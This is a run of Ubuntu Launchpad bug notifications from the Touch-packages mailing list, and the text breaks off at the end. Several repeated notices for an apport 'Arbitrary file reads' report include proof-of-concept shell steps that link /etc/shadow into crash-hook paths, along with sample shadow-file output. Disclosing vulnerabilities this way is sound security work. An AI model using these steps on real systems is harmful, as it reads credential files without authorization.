[Touch-packages] [Bug 1925025] Re: package packagekit 1.1.13-2ubuntu1.1 failed to install/upgrade: package is in a very bad inconsistent state; you should reinstall it before attempting configuration
[Expired for packagekit (Ubuntu) because there has been no activity for 60 days.] ** Changed in: packagekit (Ubuntu) Status: Incomplete => Expired -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to packagekit in Ubuntu. https://bugs.launchpad.net/bugs/1925025 Title: package packagekit 1.1.13-2ubuntu1.1 failed to install/upgrade: package is in a very bad inconsistent state; you should reinstall it before attempting configuration Status in packagekit package in Ubuntu: Expired Bug description: no further information ProblemType: Package DistroRelease: Ubuntu 20.04 Package: packagekit 1.1.13-2ubuntu1.1 ProcVersionSignature: Ubuntu 5.8.0-45.51~20.04.1-generic 5.8.18 Uname: Linux 5.8.0-45-generic x86_64 ApportVersion: 2.20.11-0ubuntu27.16 Architecture: amd64 CasperMD5CheckResult: skip Date: Mon Apr 19 14:17:46 2021 DuplicateSignature: package:packagekit:1.1.13-2ubuntu1.1 Setting up libcurl4:amd64 (7.68.0-1ubuntu2.5) ... dpkg: error processing package packagekit (--configure): package is in a very bad inconsistent state; you should ErrorMessage: package is in a very bad inconsistent state; you should reinstall it before attempting configuration InstallationDate: Installed on 2020-09-22 (209 days ago) InstallationMedia: Ubuntu 20.04.1 LTS "Focal Fossa" - Release amd64 (20200731) Python3Details: /usr/bin/python3.8, Python 3.8.5, python3-minimal, 3.8.2-0ubuntu2 PythonDetails: /usr/bin/python2.7, Python 2.7.18, python-is-python2, 2.7.17-4 RelatedPackageVersions: dpkg 1.19.7ubuntu3 apt 2.0.5 SourcePackage: packagekit Title: package packagekit 1.1.13-2ubuntu1.1 failed to install/upgrade: package is in a very bad inconsistent state; you should reinstall it before attempting configuration UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/packagekit/+bug/1925025/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1917904] Re: Arbitrary file reads
** Changed in: apport (Ubuntu Bionic)
Assignee: SatoshiNakamoto (evansanita713) => (unassigned)
** Changed in: apport (Ubuntu Focal)
Assignee: SatoshiNakamoto (evansanita713) => (unassigned)
** Changed in: apport (Ubuntu Groovy)
Assignee: SatoshiNakamoto (evansanita713) => (unassigned)
** Changed in: apport (Ubuntu Hirsute)
Assignee: SatoshiNakamoto (evansanita713) => (unassigned)
** Changed in: apport (Ubuntu Impish)
Assignee: SatoshiNakamoto (evansanita713) => (unassigned)
** Information type changed from Private Security to Public Security
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1917904
Title:
Arbitrary file reads
Status in apport package in Ubuntu:
Fix Released
Status in apport source package in Bionic:
Fix Released
Status in openjdk-lts source package in Bionic:
New
Status in apport source package in Focal:
Fix Released
Status in openjdk-lts source package in Focal:
New
Status in apport source package in Groovy:
Fix Released
Status in openjdk-lts source package in Groovy:
New
Status in apport source package in Hirsute:
Fix Released
Status in openjdk-lts source package in Hirsute:
New
Status in apport source package in Impish:
Fix Released
Status in openjdk-lts source package in Impish:
New
Bug description:
# Vulnerabilities in Apport
During a cursory code review, several potential security issues in `apport`
and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have
been identified.
While the issue regarding the `openjdk-14-lts` package is exploitable
on default installations, the remaining issues most likely are mitigated by
the sysctl setting `fs.protected_symlinks` on default Ubuntu installations.
With regard to issues mitigated by `fs.protected_symlinks`, it is not
clear if they are considered to be part of the threat model, but
nonetheless will be included in this report. Further, if the issues
regarding package hooks should be reported in the corresponding
packages' bug tracker, please let me know.
## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py
The `add_info()` function allows for a directory traversal by building a file
path using user-controlled data without properly sanitizing the resulting path.
```Python
def add_info(report, ui=None):
if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:
# attach hs_err_.pid file
cwd = report['ProcCwd']
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
pid = pid_line.groups()[0]
path = "%s/hs_err_pid%s.log" % (cwd, pid)
# make sure if exists
if os.path.exists(path):
content = read_file(path)
# truncate if bigger than 100 KB
# see LP: #1696814
max_length = 100*1024
if sys.getsizeof(content) < max_length:
report['HotspotError'] = content
report['Tags'] += ' openjdk-hs-err'
else:
report['HotspotError'] = content[:max_length] + \
"\n[truncated by openjdk-11 apport hook]" + \
"\n[max log size is %s, file size was %s]" % \
(si_units(max_length),
si_units(sys.getsizeof(content)))
report['Tags'] += ' openjdk-hs-err'
```
By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as
`0`, the function includes an arbitrary file by following a potential
symbolic link `/home/user/hs_err_pid0.log`.
### PoC
```
$ sudo apt install openjdk-14-jdk
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 1
$ ln -s /etc/shadow /home/user/hs_err_pid0.log
$ pid=$'\t0';cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
$ grep -A3 root: /var/crash/poc.crash
root:!:18393:0:9:7:::
daemon:*:18375:0:9:7:::
bin:*:18375:0:9:7:::
sys:*:18375:0:9:7:::
```
## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info)
The root cause of this issue stems from the fact, that a potentially
user-controlled file in the `/tmp` directory is not checked for being a
symbolic link and therefore might allow including arbitrary files in the
processed crash report:
Note: Requires `fs.protected_symlinks=0`
```Python
def attach_3d_info(report, ui=None):
...
# Compiz internal state if compiz crashed
if True or report.get('SourcePackage','Unknown') == "compiz" and
"ProcStatus" in report:
compiz_pid = 0
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
[Touch-packages] [Bug 1890858] Re: AppArmor profile causes QEMU/KVM - Not Connected
** Tags removed: verification-needed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1890858 Title: AppArmor profile causes QEMU/KVM - Not Connected Status in apparmor package in Ubuntu: Invalid Status in libvirt package in Ubuntu: Invalid Status in apparmor source package in Focal: New Status in libvirt source package in Focal: Fix Committed Bug description: [Impact] * libvirt in Focal in some cases e.g. with non local users needs to resolve those users. When trying to do so it fails due to apparmor isolation and breaks badly. * In later and former releases this issue isn't triggered, but it is unknown which (potentially complex) set of changes did that. A simple apparmor rule would help to allow libvirt to better function in environments with non known user IDs. [Test Plan] * Following these steps in an unfixed release triggers the issue sudo apt update; sudo apt dist-upgrade -y sudo apt install -y sssd sssd-ldap slapd ldap-utils openssl expect lsb-release libvirt-clients libvirt-daemon-system ubuntu-dev-tools pull-lp-source sssd cd sssd-2.4.1 echo "*;*;*;Al-2400;libvirt" | sudo tee -a /etc/security/group.conf head -n -5 debian/tests/ldap-user-group-ldap-auth > debian/tests/lp1890858-test chmod +x debian/tests/lp1890858-test sudo ./debian/tests/lp1890858-test sudo systemctl restart libvirtd # ensure it works in a normal login virsh list journalctl -u libvirtd # try the sssd login sudo login # use testuser1 / testuser1secret to log in virsh list If affected this will not work reporting an error like: $ virsh list error: failed to connect to the hypervisor error: End of file while reading data: Input/output error And in dmesg/journal an apparmor denial like: Jun 14 11:25:26 ldap.example.com audit[48330]: AVC apparmor="DENIED" operation="bind" profile="libvirtd" pid=48330 comm="rpc-worker" family="unix" sock_type="dgram" protocol=0 requested_mask="bind" denied_mask="bind" addr="@userdb-f283d575d74df972f9e10bd14d0befe3" [Where problems could occur] * Allowing a little bit more to a daemon that already is rather powerful and open in regard to it's profile usually isn't changing behavior. If anything it would be considered a potential risk, but this rule should be ok to be added and ubuntu-security confirmed this. [Other Info] * Comment 38 confirms that this should be ok - from the security Teams POV. https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1890858/comments/38 --- On some focal 20.04 systems, users are seeing "QEMU/KVM - Not Connected" when they attempt to use virt-manager to manage virtual machines. AppArmor denials like the following are seen in the logs: sudo grep libvirt /var/log/syslog | grep -i apparmor | grep -i denied Jun 28 14:53:27 koromicha kernel: [ 334.660844] audit: type=1400 audit(1593345207.778:951): apparmor="DENIED" operation="bind" profile="libvirtd" pid=12254 comm="libvirtd" family="unix" sock_type="dgram" protocol=0 requested_mask="bind" denied_mask="bind" addr="@userdb-6228daaaf66b14dfd14d93ef46d962c3" Jun 28 14:54:19 koromicha kernel: [ 386.034970] audit: type=1400 audit(1593345259.145:952): apparmor="DENIED" operation="bind" profile="libvirtd" pid=14311 comm="libvirtd" family="unix" sock_type="dgram" protocol=0 requested_mask="bind" denied_mask="bind" addr="@userdb-c861507740da1fa0c3356ad3b78bffe9" Jun 28 15:02:30 koromicha kernel: [ 877.339057] audit: type=1400 audit(1593345750.437:968): apparmor="DENIED" operation="bind" profile="libvirtd" pid=16175 comm="libvirtd" family="unix" sock_type="dgram" protocol=0 requested_mask="bind" denied_mask="bind" addr="@userdb-7d70643a9f8da0342f6359907817b664" Users have reported that the "solution" is to disable the AppArmor profile. More details, screenshots, etc. can be found here: https://kifarunix.com/how-to-fix-qemu-kvm-not-connected-error-on- ubuntu-20-04/ To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1890858/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1917904] Re: Arbitrary file reads
** Changed in: apport (Ubuntu Bionic)
Assignee: (unassigned) => SatoshiNakamoto (evansanita713)
** Changed in: apport (Ubuntu Focal)
Assignee: (unassigned) => SatoshiNakamoto (evansanita713)
** Changed in: apport (Ubuntu Groovy)
Assignee: (unassigned) => SatoshiNakamoto (evansanita713)
** Changed in: apport (Ubuntu Hirsute)
Assignee: (unassigned) => SatoshiNakamoto (evansanita713)
** Changed in: apport (Ubuntu Impish)
Assignee: (unassigned) => SatoshiNakamoto (evansanita713)
** Information type changed from Public Security to Private Security
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1917904
Title:
Arbitrary file reads
Status in apport package in Ubuntu:
Fix Released
Status in apport source package in Bionic:
Fix Released
Status in openjdk-lts source package in Bionic:
New
Status in apport source package in Focal:
Fix Released
Status in openjdk-lts source package in Focal:
New
Status in apport source package in Groovy:
Fix Released
Status in openjdk-lts source package in Groovy:
New
Status in apport source package in Hirsute:
Fix Released
Status in openjdk-lts source package in Hirsute:
New
Status in apport source package in Impish:
Fix Released
Status in openjdk-lts source package in Impish:
New
Bug description:
# Vulnerabilities in Apport
During a cursory code review, several potential security issues in `apport`
and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have
been identified.
While the issue regarding the `openjdk-14-lts` package is exploitable
on default installations, the remaining issues most likely are mitigated by
the sysctl setting `fs.protected_symlinks` on default Ubuntu installations.
With regard to issues mitigated by `fs.protected_symlinks`, it is not
clear if they are considered to be part of the threat model, but
nonetheless will be included in this report. Further, if the issues
regarding package hooks should be reported in the corresponding
packages' bug tracker, please let me know.
## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py
The `add_info()` function allows for a directory traversal by building a file
path using user-controlled data without properly sanitizing the resulting path.
```Python
def add_info(report, ui=None):
if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:
# attach hs_err_.pid file
cwd = report['ProcCwd']
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
pid = pid_line.groups()[0]
path = "%s/hs_err_pid%s.log" % (cwd, pid)
# make sure if exists
if os.path.exists(path):
content = read_file(path)
# truncate if bigger than 100 KB
# see LP: #1696814
max_length = 100*1024
if sys.getsizeof(content) < max_length:
report['HotspotError'] = content
report['Tags'] += ' openjdk-hs-err'
else:
report['HotspotError'] = content[:max_length] + \
"\n[truncated by openjdk-11 apport hook]" + \
"\n[max log size is %s, file size was %s]" % \
(si_units(max_length),
si_units(sys.getsizeof(content)))
report['Tags'] += ' openjdk-hs-err'
```
By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as
`0`, the function includes an arbitrary file by following a potential
symbolic link `/home/user/hs_err_pid0.log`.
### PoC
```
$ sudo apt install openjdk-14-jdk
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 1
$ ln -s /etc/shadow /home/user/hs_err_pid0.log
$ pid=$'\t0';cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
$ grep -A3 root: /var/crash/poc.crash
root:!:18393:0:9:7:::
daemon:*:18375:0:9:7:::
bin:*:18375:0:9:7:::
sys:*:18375:0:9:7:::
```
## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info)
The root cause of this issue stems from the fact, that a potentially
user-controlled file in the `/tmp` directory is not checked for being a
symbolic link and therefore might allow including arbitrary files in the
processed crash report:
Note: Requires `fs.protected_symlinks=0`
```Python
def attach_3d_info(report, ui=None):
...
# Compiz internal state if compiz crashed
if True or report.get('SourcePackage','Unknown') == "compiz" and
"ProcStatus" in report:
compiz_pid = 0
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
[Touch-packages] [Bug 1917904] Re: Arbitrary file reads
** Changed in: apport (Ubuntu Bionic)
Assignee: SatoshiNakamoto (evansanita713) => (unassigned)
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1917904
Title:
Arbitrary file reads
Status in apport package in Ubuntu:
Fix Released
Status in apport source package in Bionic:
Fix Released
Status in openjdk-lts source package in Bionic:
New
Status in apport source package in Focal:
Fix Released
Status in openjdk-lts source package in Focal:
New
Status in apport source package in Groovy:
Fix Released
Status in openjdk-lts source package in Groovy:
New
Status in apport source package in Hirsute:
Fix Released
Status in openjdk-lts source package in Hirsute:
New
Status in apport source package in Impish:
Fix Released
Status in openjdk-lts source package in Impish:
New
Bug description:
# Vulnerabilities in Apport
During a cursory code review, several potential security issues in `apport`
and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have
been identified.
While the issue regarding the `openjdk-14-lts` package is exploitable
on default installations, the remaining issues most likely are mitigated by
the sysctl setting `fs.protected_symlinks` on default Ubuntu installations.
With regard to issues mitigated by `fs.protected_symlinks`, it is not
clear if they are considered to be part of the threat model, but
nonetheless will be included in this report. Further, if the issues
regarding package hooks should be reported in the corresponding
packages' bug tracker, please let me know.
## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py
The `add_info()` function allows for a directory traversal by building a file
path using user-controlled data without properly sanitizing the resulting path.
```Python
def add_info(report, ui=None):
if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:
# attach hs_err_.pid file
cwd = report['ProcCwd']
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
pid = pid_line.groups()[0]
path = "%s/hs_err_pid%s.log" % (cwd, pid)
# make sure if exists
if os.path.exists(path):
content = read_file(path)
# truncate if bigger than 100 KB
# see LP: #1696814
max_length = 100*1024
if sys.getsizeof(content) < max_length:
report['HotspotError'] = content
report['Tags'] += ' openjdk-hs-err'
else:
report['HotspotError'] = content[:max_length] + \
"\n[truncated by openjdk-11 apport hook]" + \
"\n[max log size is %s, file size was %s]" % \
(si_units(max_length),
si_units(sys.getsizeof(content)))
report['Tags'] += ' openjdk-hs-err'
```
By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as
`0`, the function includes an arbitrary file by following a potential
symbolic link `/home/user/hs_err_pid0.log`.
### PoC
```
$ sudo apt install openjdk-14-jdk
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 1
$ ln -s /etc/shadow /home/user/hs_err_pid0.log
$ pid=$'\t0';cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
$ grep -A3 root: /var/crash/poc.crash
root:!:18393:0:9:7:::
daemon:*:18375:0:9:7:::
bin:*:18375:0:9:7:::
sys:*:18375:0:9:7:::
```
## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info)
The root cause of this issue stems from the fact, that a potentially
user-controlled file in the `/tmp` directory is not checked for being a
symbolic link and therefore might allow including arbitrary files in the
processed crash report:
Note: Requires `fs.protected_symlinks=0`
```Python
def attach_3d_info(report, ui=None):
...
# Compiz internal state if compiz crashed
if True or report.get('SourcePackage','Unknown') == "compiz" and
"ProcStatus" in report:
compiz_pid = 0
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
compiz_pid = pid_line.groups()[0]
compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid
attach_file_if_exists(report, compiz_state_file,
"compiz_internal_states")
```
### PoC
```
$ sudo sysctl fs.protected_symlinks=0
fs.protected_symlinks = 0
$ ln -s /etc/shadow /tmp/compiz_internal_state0
$ cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: source_xorg 12
[Touch-packages] [Bug 1820132] Re: /usr/share/apport/whoopsie-upload-all:AssertionError:/usr/share/apport/whoopsie-upload-all@162:collect_info:process_report:add_gdb_info:gdb_command
** Changed in: apport (Ubuntu Bionic) Assignee: (unassigned) => SatoshiNakamoto (evansanita713) ** Changed in: apport (Ubuntu Bionic) Status: Triaged => Confirmed ** Changed in: apport (Ubuntu Bionic) Status: Confirmed => Fix Committed ** Changed in: apport (Ubuntu Bionic) Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apport in Ubuntu. https://bugs.launchpad.net/bugs/1820132 Title: /usr/share/apport/whoopsie-upload-all:AssertionError:/usr/share/apport /whoopsie-upload- all@162:collect_info:process_report:add_gdb_info:gdb_command Status in apport package in Ubuntu: Fix Released Status in apport source package in Bionic: Fix Released Status in apport source package in Disco: Fix Released Bug description: The Ubuntu Error Tracker has been receiving reports about a problem regarding apport. This problem was most recently seen with package version 2.20.10-0ubuntu23, the problem page at https://errors.ubuntu.com/problem/4a48673e60f08b7d2b9067d1b47766a57f7e693e contains more details, including versions of packages affected, stacktrace or traceback, and individual crash reports. If you do not have access to the Ubuntu Error Tracker and are a software developer, you can request it at http://forms.canonical.com/reports/. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1820132/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1917904] Re: Arbitrary file reads
** Changed in: apport (Ubuntu Bionic)
Assignee: (unassigned) => SatoshiNakamoto (evansanita713)
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1917904
Title:
Arbitrary file reads
Status in apport package in Ubuntu:
Fix Released
Status in apport source package in Bionic:
Fix Released
Status in openjdk-lts source package in Bionic:
New
Status in apport source package in Focal:
Fix Released
Status in openjdk-lts source package in Focal:
New
Status in apport source package in Groovy:
Fix Released
Status in openjdk-lts source package in Groovy:
New
Status in apport source package in Hirsute:
Fix Released
Status in openjdk-lts source package in Hirsute:
New
Status in apport source package in Impish:
Fix Released
Status in openjdk-lts source package in Impish:
New
Bug description:
# Vulnerabilities in Apport
During a cursory code review, several potential security issues in `apport`
and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have
been identified.
While the issue regarding the `openjdk-14-lts` package is exploitable
on default installations, the remaining issues most likely are mitigated by
the sysctl setting `fs.protected_symlinks` on default Ubuntu installations.
With regard to issues mitigated by `fs.protected_symlinks`, it is not
clear if they are considered to be part of the threat model, but
nonetheless will be included in this report. Further, if the issues
regarding package hooks should be reported in the corresponding
packages' bug tracker, please let me know.
## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py
The `add_info()` function allows for a directory traversal by building a file
path using user-controlled data without properly sanitizing the resulting path.
```Python
def add_info(report, ui=None):
if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:
# attach hs_err_.pid file
cwd = report['ProcCwd']
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
pid = pid_line.groups()[0]
path = "%s/hs_err_pid%s.log" % (cwd, pid)
# make sure if exists
if os.path.exists(path):
content = read_file(path)
# truncate if bigger than 100 KB
# see LP: #1696814
max_length = 100*1024
if sys.getsizeof(content) < max_length:
report['HotspotError'] = content
report['Tags'] += ' openjdk-hs-err'
else:
report['HotspotError'] = content[:max_length] + \
"\n[truncated by openjdk-11 apport hook]" + \
"\n[max log size is %s, file size was %s]" % \
(si_units(max_length),
si_units(sys.getsizeof(content)))
report['Tags'] += ' openjdk-hs-err'
```
By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as
`0`, the function includes an arbitrary file by following a potential
symbolic link `/home/user/hs_err_pid0.log`.
### PoC
```
$ sudo apt install openjdk-14-jdk
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 1
$ ln -s /etc/shadow /home/user/hs_err_pid0.log
$ pid=$'\t0';cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
$ grep -A3 root: /var/crash/poc.crash
root:!:18393:0:9:7:::
daemon:*:18375:0:9:7:::
bin:*:18375:0:9:7:::
sys:*:18375:0:9:7:::
```
## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info)
The root cause of this issue stems from the fact, that a potentially
user-controlled file in the `/tmp` directory is not checked for being a
symbolic link and therefore might allow including arbitrary files in the
processed crash report:
Note: Requires `fs.protected_symlinks=0`
```Python
def attach_3d_info(report, ui=None):
...
# Compiz internal state if compiz crashed
if True or report.get('SourcePackage','Unknown') == "compiz" and
"ProcStatus" in report:
compiz_pid = 0
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
compiz_pid = pid_line.groups()[0]
compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid
attach_file_if_exists(report, compiz_state_file,
"compiz_internal_states")
```
### PoC
```
$ sudo sysctl fs.protected_symlinks=0
fs.protected_symlinks = 0
$ ln -s /etc/shadow /tmp/compiz_internal_state0
$ cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: source_xorg 12
[Touch-packages] [Bug 1931874] Re: Failure to download packages with epochs (Regression from 2.1.15)
** Tags added: regression-release ** Changed in: apt (Ubuntu Hirsute) Importance: Undecided => High ** Changed in: apt (Ubuntu Impish) Importance: Undecided => High -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu. https://bugs.launchpad.net/bugs/1931874 Title: Failure to download packages with epochs (Regression from 2.1.15) Status in apt package in Ubuntu: Fix Released Status in apt source package in Hirsute: Fix Committed Status in apt source package in Impish: Fix Released Bug description: [Impact] Packages where the epoch is encoded in the filename cannot be retrieved, as we overlooked some places when changing the acquire system to always use % encoded URLs. [Test plan] A test is included in the comprehensive test suite. [Where problems could occur] Regressions could occur in places that download debs with filenames that need quoting or are already quoted. You can argue this also changes the API slightly, since ArchiveURI() now returns encoded URLs, rather than just appending the file path to the host. Although, this could actually improve things too. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1931874/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1920836] Re: Show Extended Security Maintenence status
Also on Hirsute Hippo is ok but gives error messages: corrado@corrado-n7-hippo:~$ time software-properties-gtk No ua status file written: [Errno 2] No such file or directory: '/var/lib/ubuntu-advantage/status.json' real0m10,718s user0m2,522s sys 0m0,497s corrado@corrado-n7-hippo:~$ -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to software-properties in Ubuntu. https://bugs.launchpad.net/bugs/1920836 Title: Show Extended Security Maintenence status Status in software-properties package in Ubuntu: Fix Released Status in software-properties source package in Xenial: New Status in software-properties source package in Bionic: Fix Committed Status in software-properties source package in Focal: Fix Committed Status in software-properties source package in Hirsute: Fix Committed Bug description: [Impact] There is not currently a graphical method of determining if a system is subscribed to [Extended Security Maintenance](https://ubuntu.com/security/esm) updates. This is resolved by adding some [new UI](https://wiki.ubuntu.com/SoftwareUpdates#Extended_Security_Maintenance) to the software properties application. [Test Case] 1. Install latest version of Ubuntu advantage: $ sudo add-apt-repository ppa:ua-client/stable $ sudo apt update $ sudo apt upgrade 2. Open Software Properties 3. Go to Updates tab. Expected result: Information is shown that indicates if this system is using Extended Security Maintenance updates, when updates will supported until, and a link to upgrade to ESM. Observed result: No ESM information currently shown. [Where problems could occur] - Software properties could hit a bug getting a response from the ua app. The current code carefully checks if and what is returned, falling back to a safe default behavior. - Launching software properties could trigger a bug in the ua app. - Software properties could show incorrect information, causing confusion for the user. The solution uses information from distro-info and the ua app which means software-properties contains no data about ESM, and instead relies on these apps that can be updated if things change. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1920836/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1920836] Re: Show Extended Security Maintenence status
on Focal software-properties-gtk gives some error messages and seems very slow to start corrado@corrado-n5-focal:~$ time software-properties-gtk No ua status file written: [Errno 2] No such file or directory: '/var/lib/ubuntu-advantage/status.json' No ua status file written: [Errno 2] No such file or directory: '/var/lib/ubuntu-advantage/status.json' No ua status file written: [Errno 2] No such file or directory: '/var/lib/ubuntu-advantage/status.json' real0m14,651s user0m3,872s sys 0m0,692s corrado@corrado-n5-focal:~$ -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to software-properties in Ubuntu. https://bugs.launchpad.net/bugs/1920836 Title: Show Extended Security Maintenence status Status in software-properties package in Ubuntu: Fix Released Status in software-properties source package in Xenial: New Status in software-properties source package in Bionic: Fix Committed Status in software-properties source package in Focal: Fix Committed Status in software-properties source package in Hirsute: Fix Committed Bug description: [Impact] There is not currently a graphical method of determining if a system is subscribed to [Extended Security Maintenance](https://ubuntu.com/security/esm) updates. This is resolved by adding some [new UI](https://wiki.ubuntu.com/SoftwareUpdates#Extended_Security_Maintenance) to the software properties application. [Test Case] 1. Install latest version of Ubuntu advantage: $ sudo add-apt-repository ppa:ua-client/stable $ sudo apt update $ sudo apt upgrade 2. Open Software Properties 3. Go to Updates tab. Expected result: Information is shown that indicates if this system is using Extended Security Maintenance updates, when updates will supported until, and a link to upgrade to ESM. Observed result: No ESM information currently shown. [Where problems could occur] - Software properties could hit a bug getting a response from the ua app. The current code carefully checks if and what is returned, falling back to a safe default behavior. - Launching software properties could trigger a bug in the ua app. - Software properties could show incorrect information, causing confusion for the user. The solution uses information from distro-info and the ua app which means software-properties contains no data about ESM, and instead relies on these apps that can be updated if things change. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1920836/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1920836] Re: Show Extended Security Maintenence status
Installed from proposed on Focal: works fine! ** Attachment added: "Screenshot from 2021-06-19 20-24-30.png" https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1920836/+attachment/5505779/+files/Screenshot%20from%202021-06-19%2020-24-30.png -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to software-properties in Ubuntu. https://bugs.launchpad.net/bugs/1920836 Title: Show Extended Security Maintenence status Status in software-properties package in Ubuntu: Fix Released Status in software-properties source package in Xenial: New Status in software-properties source package in Bionic: Fix Committed Status in software-properties source package in Focal: Fix Committed Status in software-properties source package in Hirsute: Fix Committed Bug description: [Impact] There is not currently a graphical method of determining if a system is subscribed to [Extended Security Maintenance](https://ubuntu.com/security/esm) updates. This is resolved by adding some [new UI](https://wiki.ubuntu.com/SoftwareUpdates#Extended_Security_Maintenance) to the software properties application. [Test Case] 1. Install latest version of Ubuntu advantage: $ sudo add-apt-repository ppa:ua-client/stable $ sudo apt update $ sudo apt upgrade 2. Open Software Properties 3. Go to Updates tab. Expected result: Information is shown that indicates if this system is using Extended Security Maintenance updates, when updates will supported until, and a link to upgrade to ESM. Observed result: No ESM information currently shown. [Where problems could occur] - Software properties could hit a bug getting a response from the ua app. The current code carefully checks if and what is returned, falling back to a safe default behavior. - Launching software properties could trigger a bug in the ua app. - Software properties could show incorrect information, causing confusion for the user. The solution uses information from distro-info and the ua app which means software-properties contains no data about ESM, and instead relies on these apps that can be updated if things change. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1920836/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1905285] Re: socket-activated sshd breaks on concurrent connections
I'm seeing something similar to this (messages more like those in
underlying debian bug report) - in this case triggered by a script which
